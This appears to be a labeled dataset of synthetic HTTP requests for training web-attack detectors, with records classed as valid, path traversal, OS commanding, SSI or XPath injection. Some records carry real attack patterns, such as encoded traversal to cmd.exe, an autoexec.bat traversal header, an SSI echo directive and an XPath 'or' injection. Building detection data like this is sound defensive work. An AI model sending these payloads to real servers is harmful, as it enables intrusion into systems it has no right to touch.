Transfer-Encoding: oehv; oabhy=iesdAct1
Upgrade: 8wp/1.6, oh2/7.9, litly/2.3
Warning: 754 165.186.54.133:11 "ceaa7ahtoenmn" 
X-Forwarded-For: 28.137.198.105
X-Serial-Number: 365994
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 72
Start - Id: 22347
class: Valid
GET /nDww8geW7ORivyRCy/taehirregLltclh/s3h7wN.DojH-ePEuF/6syt5mutaitt/aTkF/rfxvsHEKtscJs.mdb?e79ae=8Npae&Eito2eDifrMiO=b26Bsgoc HTTP/1.0
Host: 233.48.182.93
Connection: easdn3mt
Accept: image/png, video/mpeg;q=0.1
Accept-Charset: iso-2022-kr, x-mac-cyrillic, shift_jis, windows-1257
Accept-Encoding: compress;q=0.4
Accept-Language: *
Cache-Control: max-age=928
Client-ip: 186.185.1.249
Cookie: 3lLevalpQ.Cmdyvbscript=uIieJfl;u3hT-inulll=mi3A;weAnrlcc=e@eglXH.aa;xgLyPwjlocationH7O=eFh;ewp1er2td=iameteoitQttbgsoundi
Cookie2: $Version="211"
Date: Wed, 15 Feb 06 23:34:37 CET
ETag: W/"XM6cQre2HuzJOtnEKiBo"
Expect: ufij=6adhe
From: cbgs@ernYenTseb.ch
If-Modified-Since: Sun, 18 Feb 07 04:33:25 UTC
If-Unmodified-Since: Fri, 24 Feb 06 16:47:49 CET
If-Match: "ludQSqvgpA@elhH8pnQY"
If-None-Match: *
If-Range: Tue, 11 May 04 21:48:24 GMT
Max-Forwards: 930
MIME-Version: 6.4
Pragma: At1s='uairne3'
Proxy-Authorization: NTLM Y2lsaXZtY3JodGlycWRpbXJvbjNrUmVhaGRkbGxob2FzOXNkczI=
Authorization: hmueet ooyTtdh=nsHotmu
Range: 562648-,892394-
Referer: http://tfrp.be/hBd8eg.mspx
TE: deflate;q=0.3,trailers
Trailer: Referer
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 3.6; hk-hm; rv:1.3.1) Gecko/08753640
UA-CPU: 68000
UA-Disp: 369,681,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 254x8392
Via: 8.1 193.243.207.45
Transfer-Encoding: gzip
Upgrade: snoidz/4.0
Warning: 860 www.cneasowg.jpg:0858 "rgda4" 
X-Forwarded-For: 56.17.27.167
X-Serial-Number: 570685869927204
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22347
Start - Id: 45279
class: PathTransversal
GET /elsrHskaaeBonauh/hHeegopEhss2ni/2oSeedlpekmrmlgcosea/@XFCtlikeK/itFf-nPk3TqEhPX/anmWwtVpfO8Qq4Q3W-H/nFlDk5.prnUe1LjKL/mlHi/apngwwno.dll? HTTP/1.0
Host: www.ir8zs2ssl.cz
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.2
Accept-Encoding: ../../../../../../WINDOWS/autoexec.bat
Accept-Language: *
Cache-Control: no-store
Client-ip: 226.116.80.221
Cookie2: $Version="74"
Date: Mon, 21 Jul 08 21:16:17 UTC
Expect: 3NfuiTn
If-Unmodified-Since: Wed, 20 May 09 18:13:52 GMT
If-Match: "8CrNxYL-OmTkrVs"
If-Range: Thu, 02 Jul 09 02:36:59 GMT
Max-Forwards: 9
Pragma: no-cache
Proxy-Authorization: NTLM dGFtbmFwdHZkcnNlMDJpUmtyZHRpRW9lb2VBN2lyemFnZW1oZQ==
Authorization: aaaelh etotl=zawlr
Referer: http://www.itrt.net/ecoev1ns/hyuzml.jpg
User-Agent: Mozilla/1.9 (compatible; Konqueror/6.0; Unix; Iuqrcnfa; neoe0; nOnneHdSs)
Via: 0.2 144.163.212.152, 4.0 109.95.144.221
Warning: 382 100.45.214.195 "nGnZ3swtEqlie1" "Sun, 10 Sep 06 01:36:11 GMT"
X-Forwarded-For: 77.190.150.187
X-Serial-Number: 552839024418370393
----: -----------------------------------------

null

End - Id: 45279
Start - Id: 857
class: Valid
GET /v6.A@cIQ@1OYTGS/toDtnh/or/5eoIstn/ema9vaBAi.jpeg?it=La%25v+ki%5B&mmitd7lai=74425 HTTP/1.1
Host: 136.117.69.132
Connection: 2taalah
Accept: video/mpeg, audio/*, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Eff8-z, S1ytno-un6oh0p;q=0.9
Cache-Control: max-age=78
Client-ip: 71.49.178.213
Cookie: a78sgiieMwls=enkA5Gva4;gsnha4htveey=4+ Et;fooalSnbhoirtr=12
Cookie2: $Version="73"
Date: Wed, 16 Jun 04 10:25:02 UTC
ETag: W/"kK53anUJA.Tbtsxs3CE4"
Expect: 100-continue
From: a1evt@iee3eeDn.it
If-Modified-Since: Tue, 23 Oct 07 09:28:28 UTC
If-Unmodified-Since: Sun, 22 Jan 06 04:44:27 UTC
If-Match: "@1WNQmSozVbIWs_q"
If-None-Match: *
If-Range: "w3UxByrtkS_IVAq6Bi"
Max-Forwards: 94
MIME-Version: 4.5
Pragma: tdnze=o
Proxy-Authorization: NTLM NW5qZXdhaW1ybzNpc2FybDBhc25zZXhpRW5kVGUzaTdldGk1MGFr
Authorization: NTLM aHJzbzZmbWNTeXRobXI3cm9PYnV0am5ib3R4ZWhyZGFjbnZlYW5hcnVlc25v
Range: 95471-
Referer: /Lebe7Lr/snaep/o8nmcetE.php
TE: trailers,trailers,deflate
Trailer: Trailer
User-Agent: nTWjrmcbhf http://www.nq8pxsqf.ch
UA-CPU: x86
UA-Disp: 9102,197,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 130x106
Via: 7.0 www.tte97a.jpg:0
Transfer-Encoding: identity
Upgrade: minl/7.1, rosbn/2.3
Warning: 053 www.usea.shtml "nnlclr4ng" "Mon, 14 Aug 06 16:09:38 CET"
X-Forwarded-For: 44.170.70.161
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 857
Start - Id: 44230
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 96.27.113.95:04
Connection: 8Aa9
Accept: text/*, image/jpeg;q=0.0
Accept-Charset: iso-2022-jp
Accept-Encoding: gzip, gzip, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="760"
Date: Thu, 09 Jun 05 11:43:41 CET
ETag: "tzNRwsuen.u4CaPKh"
Expect: aoaigdm=rnakey;sl6yntc=sonie
From: ided@udhoes.uk
If-Modified-Since: Wed, 22 Apr 09 07:55:48 UTC
If-Unmodified-Since: Fri, 23 Dec 05 16:31:24 CET
If-Match: "dOUYzC_fRS70QPUiG"
If-None-Match: "vmSzjvsbfVWl4hr"
If-Range: Tue, 22 Dec 09 21:12:15 UTC
Max-Forwards: 1
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: todoif 86auyni=mfqem
Range: 734241-576218
Referer: /mihh6h/krNsteen/eiremteO/ddil1c/onihnu.jsp
TE: gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: YuQrrcn/9.6.9.7
UA-CPU: x86
UA-Disp: 220,5543,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 352x848
Via: 7.3 29.110.155.152:8, FTP/2.0 www.erohGys.html, 5.4 196.0.235.156
Transfer-Encoding: hyjlh8; h88og=mtjiTugS
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 551 60.137.215.80:7814 "tgrsetastm" "Mon, 04 Feb 08 20:28:14 GMT"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44230
Start - Id: 7632
class: Valid
PUT /iy2xkS/uC/3@IPy/qtmp-bBnSYPJ/sz/tyFnJdlBMmg/eboCsLe4esrnnt/tTAQdfAKfbp5/hU8sUaD5IexecVBHS/t6.7BaY9Mc7liwKSDcM/KC.php3? HTTP/1.0
Content-Length: 175
Content-Language: rOrs,uni3g,Cedhrati
Content-Encoding: gzip
Content-Location: /enEe/1aueaEi/rmpfTaxg/ioet/iylB.tiff
Content-MD5: ZTFpaXNjbDhjZTJpb3VhYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 05:53:15 UTC
Last-Modified: Thu, 25 Oct 07 03:37:59 UTC
Host: www.Dbel7Te6g.de
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 105.240.119.173
Cookie: itz=lCrcz ;ts2he;etueaxhRIup=7awaK0
Cookie2: $Version="03"
Date: Sat, 28 May 05 14:04:51 UTC
ETag: "psNbgK28zyzZIZzv8l--"
Expect: 100-continue
From: 5o2toN@trwo.com
If-Modified-Since: Tue, 05 Sep 06 12:51:24 UTC
If-Unmodified-Since: Sun, 22 Jul 07 22:27:28 GMT
If-Match: *
If-None-Match: *
If-Range: "W67QkFB7tgWRXcVa"
Max-Forwards: 826
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: ie1iab matdiace=hbdiO
Authorization: NTLM c3RlcnRhZWZyaG5vbWV0bXdldWh0ZWdNR3llZnplOWFt
Range: 70517-,7-,66190-
Referer: /e7ow/lowr/mi3i.dll
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: tsdr8 (eUB6oKM; quTF-Hd)
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color32
Via: 1.8 8.135.106.107:499, and/5.3 www.iruottye.html, 5.3 127.84.126.16
Transfer-Encoding: identity
Upgrade: yyr85/0.6, mnLmta/7.1, sedrw/1.7, wRp3/3.2, ebe/4.8
Warning: 763 www.tBeic.jpeg "daariegtelcya7h" "Tue, 12 Oct 04 10:28:02 CET"
X-Forwarded-For: 59.74.190.194
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

A3awutf8dli=745439&oaEtoiatclc=witnlei7oplieap&mheatpwlhTr2=ie$ydit[s tqaoihr/&chx8tir7rD=24801&eScveOnneTee=ivt&oritjt=lFQdrpaRnb&wEoas=eVOaelon&ne8sdUfdoS=areadyda58hm

End - Id: 7632
Start - Id: 12935
class: Valid
GET /ii/hPqPl-u-CA/xQVsgEW0fFg6.aspx?yjnajix5=ess&oxlrssnEedAbdf=479895604&qtn=eD1eomZ&hinslatreweeai=088&nxiuidgpetol7a=e2+agyhhincludex1s&iD=iLip3aF%40sRn&tisioo5rTEc=d%2FmEiisiframeme%408%3F&tui=bt%3FI%5CRS&snodniOOl=ri&np4rgfNbia=568&obu=tuliyishdN3is HTTP/1.1
Host: www.aaejQy.org
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ept-Qri, pea6Ol-crer;q=0.1, ot-emtetry;q=0.9, ama-5oyurru;q=0.7, Roo-raafhoQh;q=0.7
Cache-Control: max-age=6
Client-ip: 163.188.17.209
Cookie: odysost0m=oaf'
Cookie2: $Version="319"
Date: Mon, 17 Nov 08 14:11:31 GMT
ETag: W/"0H171O66HssZ5bj23G"
Expect: 100-continue
From: lvrrIamn@ies0tztgT.st
If-Modified-Since: Fri, 08 Feb 08 23:33:08 UTC
If-Unmodified-Since: Sun, 07 May 06 10:56:35 UTC
If-Match: "ve9bNXTZcRwnmm-D"
If-None-Match: "NDqDruEJi.ylsySU9T1l"
If-Range: Sun, 16 Jul 06 12:37:38 CET
Max-Forwards: 86
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.anNylira.com/1wganmEi/oOtnJe/ninhd.png
Authorization: Basic amk4aXVodXI6aXNLaWVuc3Q=
Range: 976-,-97584
Referer: /pabd.mp3
TE: trailers,trailers,deflate
Trailer: Accept
User-Agent: Mozilla/2.5 (X11; U; Open BSD i586 1.5; gd-ni; rv:6.1.7) Gecko/82635099
UA-CPU: Sparc
UA-Disp: 604,6019,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3851x1864
Via: 1.4 www.tlon.gif
Transfer-Encoding: identity
Upgrade: eul/4.8, rnguen/8.4, trlsnm/4.9, eetr/3.8
Warning: 366 www.utrawot.html "Enahhagtdtdshfheg" "Wed, 29 Nov 06 11:34:27 CET"
X-Forwarded-For: 0.176.193.35
X-Serial-Number: 194126085
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12935
Start - Id: 7176
class: Valid
PUT /cemRqo/ui/node3aMGLrnL/khOUZboot.iniHBHbCztx/oOnjLThEK4cIER/7jHJv@Weil/mtenLqrliliir/rKeKN5/ntz2sr67utestiibpk.html? HTTP/1.1
Content-Length: 269
Content-Language: erxbnNoy
Content-Encoding: gzip
Content-Location: http://www.0Y3Tbo.uk/tcpse.tiff
Content-MD5: YmxVVHJlZURpdGhybzdzMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Oct 07 12:34:41 CET
Last-Modified: Mon, 25 May 09 16:50:25 GMT
Host: www.Iutoqfr.com
Connection: eTvUge
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 143.244.115.21
Cookie: Apldnhee=oogfo0dfihr6 a no;mc82wtte=oarn;OdhmTrss=ac5;igtsesxhw=ZmttpoxbEn
Cookie2: $Version="19"
Date: Sat, 25 Jul 09 12:18:35 GMT
ETag: "DCQXzbIa3QQxm.F7R5M"
Expect: HdnoTor
From: a0Qar@yilcQa.net
If-Modified-Since: Wed, 30 Mar 05 18:37:12 CET
If-Unmodified-Since: Thu, 19 Jul 07 21:10:37 GMT
If-Match: "aiCcdabKqB0QDsoKjkA"
If-None-Match: *
If-Range: Thu, 29 May 08 07:43:51 UTC
Max-Forwards: 335
MIME-Version: 8.4
Pragma: fuahH=nbrhr
Proxy-Authorization: Basic RVJkYXM3RnQ6NGFkc3JmTXQ=
Authorization: NTLM NFBsdGVJdml5ZXlvZW51cjd0ZmxpdGVheWtzNHJlaXNpZGFobW9LbkRtdDNlbQ==
Range: 975551-,9376-71358
Referer: http://www.uetnrm.net/iqbQn/Nnto.sh
TE: trailers
Trailer: Pragma
User-Agent: hwieW6 (fGdeVu; tggJvZqB; o4265Wj; ykGR.w)
UA-CPU: MIPS
UA-Disp: 337,1594,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7035x878
Via: FTP/6.6 102.219.80.5, HTTP/5.1 157.22.130.146, HTTP/1.1 7.30.159.248:10300
Transfer-Encoding: compress
Upgrade: nlg/9.6, smtan/8.3, haso/2.2, rUue/4.7, dej/6.0
Warning: 892 www.oeiareeu.shtml "skEl0E" "Sun, 11 Jul 04 16:54:27 UTC"
X-Forwarded-For: 113.209.161.140
X-Serial-Number: 94479468040904290
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

esbonaiawsoH=noyatidfzeg9e&R_servicescNQwp-gWIwp-s=29&YthfdsdUtgvn=226702&rtni19Sbtn7=otYA&ooekhsjof=184125&aNLas5Txojrb=PranunasR3Ml&idn=nebAos4lTshdn&99DkperlSUgOI=sare~e&oetud0ovulaaptl=eKIyGhz&ao=41&3C6eobNenom=3322&nAe=71610&2soa2seeaHreeL=97046&i3Iqa@wherej=teA

End - Id: 7176
Start - Id: 39423
class: SSI
GET /d87tshseonsfs9/tayP7Px485NYok3eL/e0H_Uqb3pfpL5B/aN-kkZ4eSOYNXWT/Nmocha%u9yeru0kvLrfZ/rmorr4vayn/rQv7e3DGrbm94PAJ-ZfG/pnsbHw7/h_Xva.msf?tOb=oEuGwz&php0aWkwp-U.u6Bscript=505415671&Ahhcoa5dlahi=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&rqedl5ren8read=sp HTTP/1.0
Host: 131.102.55.240
Connection: keep-alive
Accept: image/jpeg;q=0.2
Accept-Charset: windows-1252, ks_c_5601-1987;q=0.1, windows-1251
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 138.27.231.125
Cookie: aornaogf9Azh=icieTlnlibm8Lfarpopenel;xDi=s<NtnowgetEhwp->cmddropprocessing-instruction1gunionieval;lmhefeisrAith=selectsergnaymqa 
Cookie2: $Version="308"
Date: Fri, 21 Sep 07 10:59:34 GMT
ETag: W/"L9F0Hm1q-VFB2Ll@_A9"
Expect: 100-continue
From: w3by414@hseh.net
If-Modified-Since: Fri, 05 Dec 08 03:36:22 GMT
If-Unmodified-Since: Wed, 02 Apr 08 16:11:58 CET
If-Match: *
If-None-Match: "RiwBm4dPQc@cLxf976"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.4
Pragma: eh=AynaU
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic ZXk5ZW86b3lhb3J1
Range: 02-,96-
Referer: /oieaya/foFdl/incfw/1eelnr6.dll
TE: deflate
Trailer: Upgrade
User-Agent: reibB4Ouo/2.8.5.7.3
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3896x417
Via: mqta5s/1.2 www.zfn4odTd.shtml, 7.6 www.dtt3u3ta.js:1889
Transfer-Encoding: identity
Upgrade: oonp/1.0
Warning: 911 148.86.166.125:8448 "aOi1" 
X-Serial-Number: 599135486061
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39423
Start - Id: 43688
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.omhhnTstn.st
Connection: close
Accept: */*;q=0.7
Accept-Charset: cp-936;q=0.1, cp-950;q=0.9, x-mac-turkish
Accept-Encoding: *
Accept-Language: sbSt5e5-ta9aqr;q=0.3, hyit3wl-iais, r-EssdantD, sy0il-7;q=0.0
Cache-Control: max-stale
Client-ip: 224.58.43.189
Cookie: pqtqeOtm5u1fta=438934;frctfnL=o\5iyun;w;stuesheGv8oa=74746;rdmto=i;Lmvo=ageh5tpcn
Cookie2: $Version="4"
Date: Wed, 16 Dec 09 18:18:02 GMT
ETag: "Ypk8OsVE4.PySPp"
Expect: 100-continue
From: o68nO@tetn70i.cz
If-Modified-Since: Thu, 06 Sep 07 22:27:26 CET
If-Unmodified-Since: Sun, 01 Oct 06 06:42:34 GMT
If-Match: "w@QVjMuwwxTIbtY6"
If-None-Match: "KTaxUeJNXwHiis8l"
If-Range: "Q2gRfeoVn9h94TAk2mu"
Max-Forwards: 0
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest algorithm=MD5
Range: 0932-655,7-822597,-7
Referer: /dhiatiH/naN07/re2Li.asp
TE: chunked,trailers,chunked
User-Agent: Mozilla/5.6 (Machintosh; U; Mac OS X 5.7; dg-rr; rv:0.0.7) Gecko/80040285
UA-CPU: StrongARM
UA-Disp: 0760,6921,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 827x275
Via: FTP/3.6 124.89.46.107
Transfer-Encoding: deflate
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 965 www.lhcrhue2.jpeg "khnjidedehslccnwsp" "Tue, 25 Jan 05 20:48:31 UTC"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43688
Start - Id: 14943
class: Valid
GET /VQ/a29d/peeschUeidicdxehezbe/o9hQteK/atpenIxv-hY/ny@1WV-z.guO/cat1Pvbscript6C/cdetrstiNprrw4t.jpeg?echolHG7=10&esrnitdgSdh=x%40p.&nSeEgiBnbh=65663&tni58=OaHesoeYctaishvk HTTP/1.0
Host: www.nUpssesb.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=6183
Client-ip: 66.99.216.164
Cookie: smdeiner4w1o2fo=rge1mdjVeoo;op9e5e=~fot;@Rq-=iHp3cincxtJisu;tl=5
Cookie2: $Version="3"
Date: Thu, 14 Jul 05 14:08:44 CET
ETag: W/"QrWuAgHWbrhr7HcPtgG"
Expect: srnezai8=efakSfn1;grs69mqp
From: hyusCat@gshWelhtl.uk
If-Modified-Since: Sat, 01 Jan 05 15:27:38 UTC
If-Unmodified-Since: Thu, 25 May 06 14:49:06 CET
If-Match: *
If-None-Match: *
If-Range: "yFZaFkN.o-Uxxl4Txd"
Max-Forwards: 3856
MIME-Version: 0.2
Pragma: tyqtda='rh5s'
Proxy-Authorization: Basic cmV0czpzZG51ZXRs
Authorization: Basic aXRtbGk6c2gyeQ==
Range: 19024-74,-1374,-1
Referer: /Cddah/seten/sjLhw/EOittee/gYfxqnI.wav
TE: trailers,deflate,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/1.9 (Machintosh; U; PPC Mac OS X 8.3; ir-ys; rv:9.9.8) Gecko/43471979
UA-CPU: PowerPC
UA-Disp: 2597,7674,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8266x800
Via: re8qn6/7.2 www.rsaRg.htm, 7.9 www.aar8ixr.htm
Transfer-Encoding: gzip
Upgrade: nneot/1.0, iar/1.4
Warning: 920 www.4stno.html "3fzsoa8stoh11" "Wed, 04 May 05 04:08:13 GMT"
X-Forwarded-For: 120.240.133.60
X-Serial-Number: 51313390873628125654
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14943
Start - Id: 8963
class: Valid
GET /VhdA9ZMvCUMuH0T.js? HTTP/1.0
Host: 50.9.1.240:9432
Connection: lfeepaa
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: ase-1uNc0hre, so-temso;q=0.1, ecbebd-s84I;q=0.7, th-uoeowa;q=0.2
Cache-Control: max-age=3
Client-ip: 25.85.108.94
Cookie: aiorsva2otaua=li5Nzg;brodtsmowt6swa=69972922;mwsampnata=2;Nnhh6oeesl=334796;ielodto7r=$ewinntn;stO7esecrie=329641
Cookie2: $Version="894"
Date: Tue, 24 Mar 09 13:26:39 CET
ETag: W/"t3yxO6L4GU2l_dMn6TL"
Expect: 2dns
From: enona@meryupld.st
If-Modified-Since: Fri, 29 Feb 08 12:33:25 GMT
If-Unmodified-Since: Sat, 01 Dec 07 23:34:53 CET
If-Match: "I9I1euHyzPFbE6pqVZG"
If-None-Match: "gUzGhzu8gXv-y9vUZM"
If-Range: Sat, 03 Oct 09 20:54:12 CET
Max-Forwards: 9344
MIME-Version: 7.6
Pragma: os=rsCtcw
Proxy-Authorization: tNnw Thot=heMot0um
Authorization: Basic cmVyZWw6cmNkT3UwZA==
Range: 0331-,4394-646932
Referer: /traperkg/mhImf/3qeSs/rhine/o8ni.css
TE: trailers
Trailer: TE
User-Agent: dir09jne (ayUQFWs; oHKvJMKR8; d@bcm51L)
UA-CPU: PowerPC
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 557x3497
Via: HTTP/7.6 www.errghLj.htm
Transfer-Encoding: deflate
Upgrade: neh6ae/0.8, ua61t/0.4, pduRa/4.8, slsp/5.5
Warning: 034 120.251.201.26 "6paPteqsaraAe" "Sat, 13 Jun 09 10:17:27 UTC"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 982389544
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8963
Start - Id: 35690
class: XPathInjection
GET /P3@hnBorimg2gin/ZtunionZeJJ/iCkNIDU/iGuyh2s5gl4n/inxeaT0cinakxdrEn/lPC-7l2ZyysU/nmacPJN8_KmM9/2Nth/htn/mr8oEteaecscyhh/retba4uosmy7de/oeioass.php4?6eOteilvb=9++or+e6s%2Filjgi%2FleTn%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D+++or++++46271%3D&ronwoteoleoeaa=d%243ermjclnusr9beSlr1rg HTTP/1.0
Host: 59.28.66.59
Connection: keep-alive
Accept: audio/x-wav, audio/basic;q=0.0, video/*;q=0.9
Accept-Charset: euc-kr, koi8-r, iso-8859-3;q=0.4, macintosh;q=0.0, iso-8859-4;q=0.1
Accept-Encoding: *
Accept-Language: sao-ede3sE;q=0.6, sa-2zTsae;q=0.7
Cache-Control: no-cache
Client-ip: 50.131.48.51
Cookie: zjh=140705
Cookie2: $Version="576"
Date: Wed, 09 Feb 05 10:41:59 UTC
ETag: W/"nj-8LRGhI.3jkOBrNm"
Expect: fbtsncr
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Sun, 17 Aug 08 24:21:45 CET
If-Unmodified-Since: Sat, 12 Aug 06 22:39:28 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0072
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM Nm9LZW05b2hud3NldTBzbWxlbnplYWVidEYyZGVXQWRkbmlsb1Vua2xuMHNybnRl
Authorization: onlo kocbiisi=iNbo9ksy
Range: -82,-22
Referer: /oole/uieiseor/zndys.wmn
TE: chunked
Trailer: Accept-Charset
User-Agent: Mozilla/7.5 (Machintosh; U; Mac OS X 6.1; nh-bi; rv:8.6.9) Gecko/73141438
UA-CPU: PowerPC
UA-Disp: 165,7015,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 656x763
Via: HTTP/7.1 140.253.252.223
Transfer-Encoding: ieaDc
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35690
Start - Id: 14303
class: Valid
GET /Iqj/iJgowI_KD1or0A3lK0Mu/C9rvYM/oopo/xipf1ertnc/vydseea/dLosaa6nnserme/vRj/.J6selectcopyuperlYyzu1D__/IT9.gif?xX5ICscript9=ish&daTzor=Wiframe HTTP/1.1
Host: 150.64.53.141
Connection: close
Accept: */*;q=0.1
Accept-Charset: cp-936, iso-8859-7, big5;q=0.1, x-mac-greek;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: ghnregt='doamit'
Client-ip: 18.153.158.142
Cookie: iFuoha1bA6a=11088979
Cookie2: $Version="46"
Date: Mon, 18 Jul 05 19:27:49 UTC
ETag: W/"0Rl7VLkN37lA7LREvy"
Expect: mdtii
From: 5Urtoesa@acesm4hrat.de
If-Modified-Since: Fri, 15 Jul 05 05:06:39 GMT
If-Unmodified-Since: Fri, 23 Apr 10 07:45:23 UTC
If-Match: "nSTzX3iDZm21BRL36n1"
If-None-Match: *
If-Range: "VHi6H0O-0yJX_6-"
Max-Forwards: 03
MIME-Version: 3.3
Pragma: nre=simjkot
Proxy-Authorization: ui0hae s6yRyaz=a0uhr
Authorization: nwes tePeoaL=pohcrE
Range: 61-,43-,51336-
Referer: http://www.9x7ec.fr/ol8deh/ryoezanx/tNtt/sdrn.cfm
TE: trailers
Trailer: Accept-Charset
User-Agent: Eto2dnohnn/9.6.3
UA-CPU: MIPS
UA-Disp: 6371,9716,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 007x8553
Via: 9.1 www.rJhm5o5.css
Transfer-Encoding: compress
Upgrade: dUtttn/9.4, 1s6f/3.9, oer/8.1
Warning: 948 75.211.234.239 "dffhhie0act" 
X-Forwarded-For: 130.188.8.33
X-Serial-Number: 731610342681835186
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14303
Start - Id: 13639
class: Valid
GET /te7Lot6k5/sfb/i2ZP_wy0.jpeg?Nteh=rPa&qexEmofekd=bfk7P4t.yG&tLrea9hsb58twy=2217001870&he8onea5=n%26ndsaheamtr&Jes=lna5ghohedutET&mhlnms0lpud=7630331&coaczco0ahdrmu=g0aem HTTP/1.1
Host: 63.47.202.46
Connection: iteem
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: riiT-i6;q=0.1, h8Ga1n-his;q=0.2, 2sxtc-siBvooh, njure-ae;q=0.3
Cache-Control: no-cache
Client-ip: 4.8.246.155
Cookie: Fdeweaerinrt=048121195;WMgG=zinl';niioe6eamocs=010;hi=70;lhyijiZan3e=36066839
Cookie2: $Version="758"
Date: Sun, 17 Jun 07 19:31:48 CET
ETag: W/"I.cbC8-6nNTxQ-rmcvd"
Expect: osehdeM=uiape6e
From: 2uses@EiiTw.cz
If-Modified-Since: Sun, 22 Jun 08 15:39:46 GMT
If-Unmodified-Since: Wed, 07 Apr 04 22:43:12 GMT
If-Match: "FRi3VMm2DD3YCE586Xrq"
If-None-Match: *
If-Range: *
Max-Forwards: 3709
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: evYe vtutcenr=svCN1T
Authorization: NTLM ZXByc3JrN2FvZW5rZ3Nzbm5kbWRoZTZ0b3EzZjZlZndzbHI=
Range: 61-
Referer: /v1n4e/tlyglo/dfwE7Oso.asp
TE: trailers,chunked
Trailer: Warning
User-Agent: btblp/1.0.1.1.5
UA-CPU: StrongARM
UA-Disp: 0811,7383,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6148x9235
Via: 1.1 www.yqo4goHi.css
